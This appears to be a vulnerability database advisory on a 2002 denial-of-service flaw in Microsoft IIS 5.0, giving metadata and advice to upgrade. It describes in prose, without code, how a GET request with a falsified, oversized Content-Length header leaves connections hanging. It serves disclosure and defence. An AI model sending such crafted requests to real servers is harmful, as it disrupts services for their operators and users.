vendor:
IIS 5.0
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: IIS 5.0
Affected Version From: IIS 5.0
Affected Version To: IIS 5.0
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:iis:5.0
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002
Microsoft IIS 5.0 Denial of Service Vulnerability
Microsoft IIS 5.0 may be prone to a denial of service condition when sent a specially crafted malformed HTTP GET header. If an IIS 5.0 web server is sent a crafted HTTP GET request which contains a falsified and excessive 'Content-Length' field, it behaves in an unusual manner. The server keeps the connection open and does not time out, but does not respond otherwise. It is possible that this may be used to cause a denial of service to the web server.
Mitigation:
It is recommended to upgrade to the latest version of IIS 5.0 to mitigate this vulnerability.
